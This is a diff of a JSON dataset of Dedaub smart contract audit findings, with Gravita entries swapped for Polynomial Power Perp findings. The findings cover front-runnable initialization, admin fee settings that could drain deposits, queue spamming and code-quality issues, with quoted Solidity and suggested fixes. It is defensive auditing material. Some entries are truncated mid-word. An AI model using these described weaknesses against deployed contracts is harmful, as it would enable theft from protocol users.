// Reset pendingCollGains since those were all sent to the borrower Colls memory tempPendingCollGains; pendingCollGains[_to] = tempPendingCollGains; } Also, StabilityPool::controller is unused and never set: IAdminContract public controller; Finally, variables activePool, defaultPool in GravitaBase seem unused and not set (at least for most subcontracts of GravitaBase). IActivePool public activePool; IDefaultPool internal defaultPool;", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "events are emitted for several interactions OPEN In LiquidityPool::processWithdrawals there is no event emitted when a withdrawal is attempted but there are 0 funds available to be withdrawn. In LiquidityPool::setFeeReceipient there is no event emitted even though a relevant event is declared in the contract (event UpdateFeeReceipient). In LiquidityPool::executePerpOrders there is no event emitted when the admin executes an order. In KangarooVault::executePerpOrders there is no event emitted when the admin executes an order. In KangarooVault::receive there is no event emitted when the contract receives ETH, in contrast to the LiquidityPool, which emits an event for this", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "is really just a transfer INFO In StabilityPool::_sendGainsToDepositor, it is not clear why the transferFrom is not merely a transfer. function _sendGainsToDepositor( address _to, address[] memory assets, uint256[] memory amounts ) internal { for (uint256 i = 0; i < assetsLen; ++i) { IERC20Upgradeable(asset).safeTransferFrom(address(this), _to, amount); } }", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "of minimum deposit and withdraw amount checks allow users to spam the queues with small requests OPEN In LiquidityPool, users can request to deposit or withdraw any amount of tokens by calling the queueDeposit and queueWithdraw functions. Although there are checks in place to avoid registering zero-amount requests, there are no checks to ensure that someone cannot spam the queue with requests for infinitesimal amounts. LiquidityPool::queueDeposit() function queueDeposit(uint256 amount, address user) external override nonReentrant whenNotPaused(\"POOL_QUEUE_DEPOSIT\") { require(amount > 0, \"Amount must be greater than 0\"); // Dedaub: Add a minDepositAmount check QueuedDeposit storage newDeposit = depositQueue[nextQueuedDepositId]; ... } LiquidityPool::queueWithdraw() function queueWithdraw(uint256 tokens, address user) external override nonReentrant whenNotPaused(\"POOL_QUEUE_WITHDRAW\") { require(liquidityToken.balanceOf(msg.sender) >= tokens && tokens > 0); // Dedaub: Add a minWithdrawAmount check ... QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... } Even though there is no clear financial incentive for someone to do this, an incentive would be to disrupt the normal flow of the protocol, and to annoy regular users, who would have to spend more gas until their requests were processed. However, the functions that process the queues can be called by anyone, including the admin, and users can also bypass the queues by directly depositing or withdrawing their tokens for a fee. 
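A minimal sketch of the suggested guards (minDepositAmount and minWithdrawAmount being hypothetical admin-set storage variables, not present in the current code): require(amount >= minDepositAmount, \"deposit too small\"); and, symmetrically, require(tokens >= minWithdrawAmount, \"withdrawal too small\"); 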
KangarooVault suffers from the same issue for withdrawals. For deposits, a minDepositAmount variable is defined and checked each time a new deposit call is made. KangarooVault::initiateDeposit() function initiateDeposit( address user, uint256 amount ) external nonReentrant { require(user != address(0x0)); require(amount >= minDepositAmount); ... } KangarooVault::initiateWithdrawal() function initiateWithdrawal( address user, uint256 tokens ) external nonReentrant { require(user != address(0x0)); if (positionData.positionId == 0) { ... } else { require(tokens > 0, \"Tokens must be greater than 0\"); // Dedaub: Add a minWithdrawAmount check here QueuedWithdraw storage newWithdraw = withdrawalQueue[nextQueuedWithdrawalId]; ... } VAULT_TOKEN.burn(msg.sender, tokens); }", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "with more than 18 decimals are not supported INFO Tokens with more than 18 decimals are not supported, based on the SafetyTransfer library (outside the audit scope). function decimalsCorrection(address _token, uint256 _amount) internal view returns (uint256) { if (_token == address(0)) return _amount; if (_amount == 0) return 0; uint8 decimals = ERC20Decimals(_token).decimals(); if (decimals < 18) { return _amount.div(10**(18 - decimals)); } return _amount; // Dedaub: more than 18 not supported correctly! } We do not recommend trying to address this, as it may introduce other complexities for very little practical benefit. Instead, we recommend just being aware of the limitation.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "deposit and withdraw arguments are not validated OPEN LiquidityPool's deposit and withdraw functions do not require that the specified user, which will receive the tokens, is different from address(0). The caller of the aforementioned functions might not set the parameter correctly or make the incorrect assumption that by setting it to address(0) it will default to msg.sender, leading to the tokens being sent to the wrong address. At the same time, the deposited/withdrawn amount is not required to be greater than 0.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "statement (consisting of a mere expression) INFO In BorrowingOperations::openVessel, the following expression (used as a statement!) is a no-op: vars.debtTokenFee;", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "can be front-run OPEN The VaultToken contract declares the setVault function to solve the dual dependency problem between VaultToken and KangarooVault, as both require each other's address for their initialisation. However, this function can be called by anyone, whereas the vault address can only be set once. 
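A sketch of a possible guard (deployer being a hypothetical immutable recorded in the constructor, not part of the audited code): function setVault(address _vault) external { require(msg.sender == deployer, \"only deployer\"); require(vault == address(0), \"vault already set\"); vault = _vault; } 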
Absent such a guard, we raise a warning here to emphasize that the VaultToken contract needs to be correctly initialized, as otherwise the call could be front-run or repeated (in case the initialization performed by the protocol team fails for some reason and the uninitialized variable remains unnoticed) to initialize the vault storage variable with a malicious Vault address. L10 LiquidityPool::closeShort should use mulWadUp too OPEN The closeShort function of the LiquidityPool contract has the same logic as openLong. openLong passes the rounding error cost to the user by using mulWadUp for the tradeCost calculation. However, closeShort does not adopt this behavior and uses mulWadDown for the same calculation. We recommend changing this to be the same as openLong. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocol's owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-profile, high-value protocols have significant centralization threats.) ", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "external function, not called as expected INFO BorrowerOperations::moveLiquidatedAssetToVessel appears to not be used in the protocol. // Send collateral to a vessel. Called by only the Stability Pool. function moveLiquidatedAssetToVessel( address _asset, uint256 _amountMoved, address _borrower, address _upperHint, address _lowerHint ) external override { _requireCallerIsStabilityPool(); _adjustVessel(_asset, _amountMoved, _borrower, 0, 0, false, _upperHint, _lowerHint); }", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " OPEN In LiquidityPool, the admin has increased power over its position leverage and the margin that is deposited to or withdrawn from the Synthetix Perp Market. More specifically: First of all, the admin can arbitrarily set the leverage through the LiquidityPool's updateLeverage function. Essentially, the risk of the LiquidityPool can be arbitrarily increased. LiquidityPool::updateLeverage() function updateLeverage(uint256 _leverage) external requiresAuth { require(_leverage >= 1e18); emit UpdateLeverage(futuresLeverage, _leverage); futuresLeverage = _leverage; } LiquidityPool::_calculateMargin() function _calculateMargin( int256 size ) internal view returns (uint256 margin) { (uint256 spotPrice, bool isInvalid) = baseAssetPrice(); require(!isInvalid && spotPrice > 0); uint256 absSize = size.abs(); margin = absSize.mulDivDown(spotPrice, futuresLeverage); } The admin is also responsible for managing the margin of the pool's Synthetix Perp position. Via the LiquidityPool::increaseMargin function, the admin can use up to the whole available balance of the pool. The logic that decides when the aforementioned function is called is off-chain. 
LiquidityPool::increaseMargin() function increaseMargin( uint256 additionalMargin ) external requiresAuth nonReentrant { perpMarket.transferMargin(int256(additionalMargin)); usedFunds += int256(additionalMargin); require(usedFunds <= 0 || totalFunds >= uint256(usedFunds)); emit IncreaseMargin(additionalMargin); } Additionally, the LiquidityPool::rebalanceMargin function can be used to increase or decrease the pool's margin inside the limits set by the pool's leverage and the margin limits set by Synthetix. Again, the logic that decides the marginDelta parameter and calls rebalanceMargin is off-chain. The KangarooVault suffers from similar centralization issues. Nevertheless, the function setLeverage of the KangarooVault does not allow the admin to set the leverage to more than 5x. N2 LiquidityPool admin can drain all deposited funds by being able to arbitrarily set the fee percentages OPEN In LiquidityPool, there are several functions that only the admin can control and allow him to parameterise all fee variables, such as deposit and withdrawal fees. However, there are no limits imposed on the values set for these variables. LiquidityPool::setFees() function setFees( uint256 _depositFee, uint256 _withdrawalFee ) external requiresAuth { ... // Dedaub: We recommend adding checks for depositFee and withdrawalFee // to prevent unrestricted fee rates depositFee = _depositFee; withdrawalFee = _withdrawalFee; } This means that the admin could change the deposit/withdrawal fee and have all the newly deposited/withdrawn funds moved to the feeRecipient address. Apart from the obvious centralisation issue, such checks could prevent huge losses in the event of a compromise of the admin account or the protocol itself. On the other hand, such checks have been used in the KangarooVault and thus we strongly recommend adding them to LiquidityPool as well. KangarooVault::setFees() function setFees( uint256 _performanceFee, uint256 _withdrawalFee ) external requiresAuth { require(_performanceFee <= 1e17 && _withdrawalFee <= 1e16); ... performanceFee = _performanceFee; withdrawalFee = _withdrawalFee; } The same applies to the following functions that also need limits on the possible values that can be set by the admin: LiquidityPool::updateLeverage() (see also N1 for an example) LiquidityPool::updateStandardSize() LiquidityPool::setBaseTradingFee() LiquidityPool::setDevFee() LiquidityPool::setMaxSlippageFee() OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend considering them. ", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "isInitialized flags INFO The following pattern over storage variable isInitialized appears in several contracts but should be entirely unnecessary, due to the presence of the initializer modifier. bool public isInitialized; function setAddresses(...) 
external initializer { require(!isInitialized); isInitialized = true; } Contracts with the pattern include FeeCollector, PriceFeed, ActivePool, CollSurplusPool, DefaultPool, SortedVessels, StabilityPool, VesselManager, VesselManagerOperations, CommunityIssuance, GRVTStaking.", + "title": "requirements can be added ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": " INFO Functions _addCollateral and _removeCollateral of the Exchange contract do not require that amount > 0. Function _liquidate does not require that debtRepaying > 0.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "INFO The codebase exhibits some old code patterns (which we do not recommend fixing, since they directly mimic the Liquity trusted code): The use of assert for condition checking (instead of require/if-revert). (Some of the asserts have been replaced, but not all.) The use of SafeMath instead of relying on Solidity 0.8.* checks.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "does not check if the collateral is already approved INFO Function ShortCollateral::approveCollateral does not require that collateral.isApproved == false to disallow approving the same collateral more than once.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "and error-prone use of this.* INFO Some same-contract function calls are made with the pattern this.func(), which causes a new internal transaction and changes the msg.sender. This should be avoided for clarity and (gas) performance. In VesselManager: function isVesselActive(address _asset, address _borrower) public view override returns (bool) { return this.getVesselStatus(_asset, _borrower) == uint256(Status.active); } In PriceFeed (and also note the unusual convention of 0 = ETH): function _calcEthPrice(uint256 ethAmount) internal returns (uint256) { uint256 ethPrice = this.fetchPrice(address(0)); // Dedaub: Also, why the convention that 0 = ETH? return ethPrice.mul(ethAmount).div(1 ether); } function _fetchNativeWstETHPrice() internal returns (uint256 price) { uint256 wstEthToStEthValue = _getWstETH_StETHValue(); OracleRecord storage stEth_UsdOracle = registeredOracles[stethToken]; price = stEth_UsdOracle.exists ? this.fetchPrice(stethToken) : _calcEthPrice(wstEthToStEthValue); _storePrice(wstethToken, price); } Compatibility of PriceFeed::_fetchPrevFeedResponse,", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "can return early in some cases INFO In LiquidityPool::hedgePositions there is no handling of the case where newPosition is equal to 0 and the execution can return early.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 
23.pdf", - "body": "with future versions of the Chainlink INFO Aggregator The roundId returned by the Chainlink AggregatorProxy contract is a uint80.The 16 most important bits keep the phaseId (incremented every time the underlying aggregator is updated) and the other 64 bits keep the roundId of the aggregator. As long as the underlying aggregator is the same, the roundId returned by the proxy will increase by one in each new round, but in an update of the aggregator contract the proxy roundId will increment not by 1, since the phaseId will also change. In this case the previous round is not current_roundId-1 and _fetchPrevFeedResponse will not return the price data from the previous round (which was a round of the previous aggregator). We mention this issue, although the probability that the protocol fetches a price at the time of an update of a Chainlink oracle is relatively small and each round lasts a few minutes to an hour. PriceFeed::_isValidResponse does all the validity checks necessary for the current Chainlink Aggregator version. Chaninlinks AggregatorProxy::latestRoundData returns also two extra values uint256 startedAt, uint80 answeredInRound, which, for the current version, do not hold extra information i.e. answeredInRound==roundId, but in past and possible future versions they could be used for some extra validity checks i.e. answeredInRound>=roundId.", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "pause logic used in KangarooVault INFO Core contracts of the protocol such as LiquidityPool and Exchange inherit the PauseModifier and use separate pause logic on several functions. In contrast, KangarooVault, which has an implemented logic similar to LiquidityPool, inherits the PauseModifier but it does not use the whenNotPaused modier on any function.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "code In BorrowerOperations: function _requireNonZeroAdjustment( uint256 _collWithdrawal, uint256 _debtTokenChange, uint256 _assetSent ) internal view { require( INFO msg.value != 0 || _collWithdrawal != 0 || _debtTokenChange != 0 || 1 _assetSent != 0, \"BorrowerOps: There must be either a collateral change or a debt // Dedaub: `msg.value != 0` not possible change\" ); } the condition msg.value != 0 is not possible, as ensured in the single place where this function is called (_adjustVessel). The condition should be kept if the function is to be usable elsewhere in the future. Similarly, in VesselManager, the condition marked with a comment below seems unnecessary, given that the arithmetic is compiler-checked. function decreaseVesselDebt( address _asset, address _borrower, uint256 _debtDecrease ) external override onlyBorrowerOperations returns (uint256) { uint256 oldDebt = Vessels[_borrower][_asset].debt; if (_debtDecrease == 0) { return oldDebt; // no changes } uint256 paybackFraction = (_debtDecrease * 1 ether) / oldDebt; uint256 newDebt = oldDebt - _debtDecrease; Vessels[_borrower][_asset].debt = newDebt; if (paybackFraction > 0) { if (paybackFraction > 1 ether) { // Dedaub:Impossible. 
The \"-\" would have reverted, three lines above paybackFraction = 1 ether; } feeCollector.decreaseDebt(_borrower, _asset, paybackFraction); } return newDebt; } 1", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "logic can be optimized to save gas INFO 2 In the functions LiquidityPool::processWithdraws and KangarooVault::processWithdrawalQueue, the LP token price is calculated in every iteration of the loop that processes withdrawals when in fact it does not change. Thus, the computation could be performed once, before the loop, to save gas.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "ownable policy INFO Some contracts are dened to be Ownable (using the OZ libraries), yet do not use this capability (beyond initialization). These include: StabilityPool initializes Ownable, relinquishes ownership, but never checks ownership in setAddresses, or elsewhere. function setAddresses( address _borrowerOperationsAddress, address _vesselManagerAddress, address _activePoolAddress, address _debtTokenAddress, address _sortedVesselsAddress, address _communityIssuanceAddress, address _adminContractAddress ) external initializer override { __Ownable_init(); renounceOwnership(); // Dedaub: The function was onlyOwner in Liquity, here there's // no point of Ownable } VesselManagerOperations inherits and initializes ownable functionality but is it used? function setAddresses( address _vesselManagerAddress, address _sortedVesselsAddress, address _stabilityPoolAddress, address _collSurplusPoolAddress, address _debtTokenAddress, address _adminContractAddress ) external initializer { __Ownable_init(); // YS:! why? 2 }", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "calls to LiquidityPool from KangarooVault INFO The functions removeCollateral and _openPosition of the KangarooVault contract, call LiquidityPool::getMarkPrice to get the mark price. However, this function only calls Exchange::getMarkPrice without adding any extra functionality. Therefore, we recommend making a direct call to Exchange::getMarkPrice from KangarooVault instead, to save some gas.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "explicit check in BorrowerOperations::openVessel that the collateral deposited by the user is approved INFO If a user aempts to open a Vessel with a collateral asset not approved by the owner, the transaction will fail, because there will be no price oracle registered for this asset. Therefore it is checked if the user deposits an approved collateral asset, but only indirectly. 
An explicit check along these lines would be better.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "could be made external INFO The following functions could be made external instead of public, as they are not called by any of the contract functions: Exchange.sol refresh orderFee LiquidityPool.sol LiquidityToken.sol PowerPerp.sol ShortToken.sol refresh ShortCollateral.sol SynthetixAdapter.sol refresh getMinCollateral canLiquidate maxLiquidatableDebt getSynth getCurrencyKey getAssetPrice getAssetPrice SystemManager.sol init setStatusFunction", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "only partially initializes the collateralParams structure INFO We cannot find a specific problem with the current partial initialization, since even if the owner just adds a new _collateral and does not set all the fields of collateralParams[_collateral], upon opening a Vessel the protocol sets the default values for these. But, in general, it is not a good practice to leave uninitialized variables and it would be better if in addNewCollateral the owner also set the default values for the remaining collateralParams elements.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "overrides INFO All function and storage variable overrides in the Exchange, LiquidityPool, ShortCollateral and SynthetixAdapter contracts are redundant and can be removed.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "internal functions INFO In StabilityPool, the following two functions are unused. function _requireUserHasVessel(address _depositor) internal view { address[] memory assets = adminContract.getValidCollateral(); uint256 assetsLen = assets.length; for (uint256 i; i < assetsLen; ++i) { if (vesselManager.getVesselStatus(assets[i], _depositor) == 1) { return; } } revert(\"StabilityPool: caller must have an active vessel to withdraw AssetGain to\"); } function _requireUserHasAssetGain(address _depositor) internal view { (address[] memory assets, uint256[] memory amounts) = getDepositorGains(_depositor); for (uint256 i = 0; i < assets.length; ++i) { if (amounts[i] > 0) { return; } } revert(\"StabilityPool: caller must have non-zero gains\"); }", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "storage variables INFO There are a number of storage variables that are not used: Exchange::SUSD, KangarooVault::maxDepositAmount, LiquidityPool::addressResolver", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "mistakes in names or comments INFO This issue collects several items, all superficial, but easy to fix. 
AdminContract: uint256 public constant PERCENT_DIVISOR_DEFAULT = 100; // dividing by 100 yields 0.5% // Dedaub: No, it yields 1% AdminContract: function setAsDefaultWithRemptionBlock( // Dedaub: spelling AdminContract: struct CollateralParams { uint256 redemptionBlock; // Dedaub: misnamed, it's in seconds } (We advise special caution, since the field is set in two ways, so external callers may be confused by the name and pass a block number, whereas the calculation is in terms of seconds.) StabilityPool: // Internal function, used to calculcate ... PriceFeed: * - If price decreased, the percentage deviation is in relation to the the FeeCollector: function _createFeeRecord( address _borrower, address _asset, uint256 _feeAmount, FeeRecord storage _sRecord ) internal { uint256 from = block.timestamp + MIN_FEE_DAYS * 24 * 60 * 60; // Dedaub: `1 days` is the best way to write this, as done // elsewhere in the code", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "variables can be made immutable INFO The following storage variables can be made immutable: SystemManager.sol SynthetixAdapter.sol addressResolver futuresMarketManager synthetix exchangeRates", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "for gas optimization INFO Gas savings were not a focus of the audit, but there are some clear instances of repeat work or missed opportunities for immutable fields. StabilityPool: function receivedERC20(address _asset, uint256 _amount) external override { totalColl.amounts[collateralIndex] += _amount; uint256 newAssetBalance = totalColl.amounts[collateralIndex]; } The two highlighted lines (likely) perform two SLOADs and one SSTORE. Using an intermediate temporary variable for the sum will save an SLOAD. DebtToken: the following variable is only set in the constructor and could be declared immutable. address public timelockAddress;", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "is not used INFO The function liquidate of the LiquidityPool contract is not called by the Exchange, which is the only contract that would be able to call it. At the same time, this means that the LiquidityPool::_hedge function is always called with its second argument set to false. Furthermore, if this function is maintained for future use, we raise a warning here that hedgingFees are accounted for twice: once by LiquidityPool::_hedge and once more directly inside the liquidate function. LiquidityPool::liquidate() function liquidate( uint256 amount ) external override onlyExchange nonReentrant { ... uint256 hedgingFees = _hedge(int256(amount), true); // Dedaub: hedgingFees are double counted here usedFunds += int256(hedgingFees); emit Liquidate(markPrice, amount); }", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "constants INFO Our recommendation is for all numeric constants to be given a symbolic name at the top of the contract, instead of being interspersed in the code. 
VesselManagerOperations::getRedemptionHints: collLot = collLot * REDEMPTION_SOFTENING_PARAM / 1000; AdminContract::setAsDefaultWithRedemptionBlock: if (blockInDays > 14) { ... BorrowerOperations::openVessel: contractsCache.vesselManager.setVesselStatus(vars.asset, msg.sender, 1); // Dedaub: 1 stands for \"active\", but is obscure", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "code comment INFO The code comment of KangarooVault::saveToken mentions Save ER", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Low" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "inconsistent INFO Contract IDebtToken is not really an interface, since it contains full ER", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "from the vault (not SUSD or UNDERLYING) when there is no notion of an UNDERLYING token.", "labels": [ "Dedaub", - "Gravita", - "Severity: Informational" + "Polynomial Power Perp Contracts", + "Severity: Critical" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "functionality.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "in the use of the word recipient INFO In LiquidityPool, KangarooVault and ILiquidityPool, all appearances of the word recipient contain a typo and are written as receipient. For example, the fee recipient storage variable is written as feeReceipient instead of feeRecipient.", "labels": [ "Dedaub", - "Gravita", - "Severity: Critical" + "Polynomial Power Perp Contracts", + "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Gravita/Gravita Audit, Apr. 23.pdf", - "body": "allowed deviation between two consecutive oracle prices seems to be too high INFO In PriceFeed.sol there is a MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND constant set to 5e17, i.e., 50%. If the percentage deviation of two consecutive Chainlink responses is greater than this constant, the protocol rejects the new price as invalid. But the value of this constant seems to be too high. Moreover, we think it would be better if the protocol used a different MAX_PRICE_DEVIATION_FROM_PREVIOUS_ROUND for each collateral asset, also considering the volatility of the asset. A23 Compiler bugs INFO The code has the compiler pragma ^0.8.10. For deployment, we recommend no floating pragmas, i.e., a fixed version, for predictability. Solc version 0.8.10, specifically, has some known bugs, which we do not believe to affect the correctness of the contracts.", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "duplication INFO The functions canLiquidate and maxLiquidatableDebt of ShortCollateral.sol share a large proportion of their code. 
For readability this part could be included in a separate method.", "labels": [ "Dedaub", - "Gravita", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", - "body": "use of weak blacklists Furucombo Gelato makes use of a number of blacklists including: - Who can create a new task - What task can be created It is, however, trivial for any user to get around this blacklisting style. For instance, in the case of a task, one can simply add some additional calldata which does not affect the semantics of the task. Therefore, if there is a reason to blacklist users or tasks, a stronger mechanism needs to be designed. L2 delegateCallOnly methods not properly guarded in Actions CLOSED In TaskExecutor the delegateCallOnly() modifier is defined to ensure that the batchExec() method is only called via delegate call, as intended by the deployers. This can be reused by the other Actions as well, to make sure that they are not misused. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly affect the functionality of the project, but we recommend addressing them. ", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "large liquidation bonus percentage could lead to a decrease, instead of the expected increase, of the collateral ratio INFO A liquidation of a part of an underwater position is expected to increase its collateralization ratio. In a partial liquidation, the liquidator deletes part of the position and gets collateral of the same value, but also some extra collateral as liquidation bonus. If the liquidation bonus percentage is large, the collateral ratio after the liquidation could be lower compared to the one before. The parameters of the protocol should be chosen carefully to avoid this problem. For example: WIPEOUT_CUTOFF * coll.liqRatio > 1 + coll.liqBonus", "labels": [ "Dedaub", - "Furucombo smart wallet and gelato", - "Severity: Low" + "Polynomial Power Perp Contracts", + "Severity: Informational" ] }, { - "title": "pragma ", - "html_url": "https://github.com/dedaub/audits/tree/main/Furucombo/Furucombo smart wallet and gelato audit Sep 21.pdf", - "body": " CLOSED The floating pragma pragma solidity ^0.6.0; is used in most contracts, allowing them to be compiled with the 0.6.0 - 0.6.12 versions of the Solidity compiler. Although the differences between these versions are small, floating pragmas should be avoided and the pragma should be fixed to the version that will be used for the contracts' deployment. A2 Compiler known issues INFO The contracts were compiled with the Solidity compiler 0.6.12 which, at the time of writing, has multiple issues related to memory arrays. Since furucombo-smart-wallet makes heavy use of memory arrays, and sends and receives these to/from third-party contracts, it is worth considering switching to a newer version of the Solidity compiler. 
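Whichever compiler version is chosen, a fixed pragma (for instance pragma solidity 0.6.12; for the current toolchain) avoids the floating-pragma concern raised in A1. 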
0", + "title": "", + "html_url": "https://github.com/dedaub/audits/tree/main/Polynomial/Polynomial Power Perp Contracts Audit - Apr '23.pdf", + "body": "check that normalizationUpdate is positive INFO The functions getMarkPrice and updateFundingRate of the Exchange contract compute the normalizationUpdate variable using the formula: int256 totalFunding = wadMul(fundingRate, (currentTimeStamp - fundingLastUpdatedTimestamp)); int256 normalizationUpdate = 1e18 - totalFunding; Although the fundingRate is bounded (it takes values between -maxFunding and maxFunding), the dierence currentTimeStamp - fundingLastUpdatedTimestamp is not, therefore totalFunding can in principle have an arbitrarily large value, especially a value greater than 1e18 (using 18 decimals precision). The result would be a negative normalizationUpdate and negative mark price, which would mess all the computations of the protocol. A check that normalizationUpdate is positive could be added. Nevertheless, since the value of the maxFunding is 1e16, the protocol has to be inactive for at least 100 days, before this issue occurs. A17 Compiler version and possible bugs INFO The code can be compiled with Solidity 0.8.9 or higher. For deployment, we recommend no floating pragmas, but a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.9, in particular, has some known bugs, which we do not believe aect the correctness of the contracts. 2", "labels": [ "Dedaub", - "Furucombo smart wallet and gelato", + "Polynomial Power Perp Contracts", "Severity: Informational" ] }, { - "title": "", - "html_url": "https://github.com/dedaub/audits/tree/main/Lido/Lido Avalanche Audit - July 22.pdf", - "body": "may irreversibly 